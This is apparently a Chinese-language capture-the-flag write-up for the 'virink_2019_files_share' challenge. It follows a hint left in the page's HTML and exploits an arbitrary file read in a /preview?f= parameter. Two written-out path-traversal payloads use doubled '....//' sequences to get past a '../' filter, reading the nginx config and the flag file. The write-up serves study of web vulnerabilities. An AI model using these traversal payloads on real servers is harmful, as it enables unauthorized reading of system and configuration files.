virink_2019_files_share
进来就是js小游戏,没有什么提示说还原后才给flag,所以可以直接信息搜集
1 2 3 4 5 6 7 8 9 10
| <head> <meta charset="UTF-8"> <title>The Cube</title> <meta name="viewport" content="width=device-width,height=device-height,user-scalable=no,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0"> <link rel="stylesheet" href="/static/style.css"> <link rel="icon" href="/uploads/favicon.ico" type="image/x-icon" /> <!-- Hint : flag in f1ag_Is_h3re --> <!-- 趣味题,真的是为了出题而出题的,别打我。 By Virink --> </head>
|
发现提示进去看看。
任意文件读取(双写绕过过滤):由于是使用OpenResty,尝试包含nginx的配置文件,默认是/etc/nginx/conf.d/default.conf
尝试访问后发现过滤了../,所以使用双写绕过
1
| /preview?f=....//....//....//....//....//....//....//etc..//nginx..//conf.d..//default.conf
|
然后根据提示访问flag文件
1
| /preview?f=....//....//....//....//....//....//....//f1ag_Is_h3re..//flag
|
参考链接:
https://blog.csdn.net/qq_46263951/article/details/119599368
Author:
odiws
Permalink:
http://odiws.github.io/2024/09/24/virink-2019-files-share/
License:
Copyright (c) 2019 CC-BY-NC-4.0 LICENSE
Slogan:
Do you believe in DESTINY?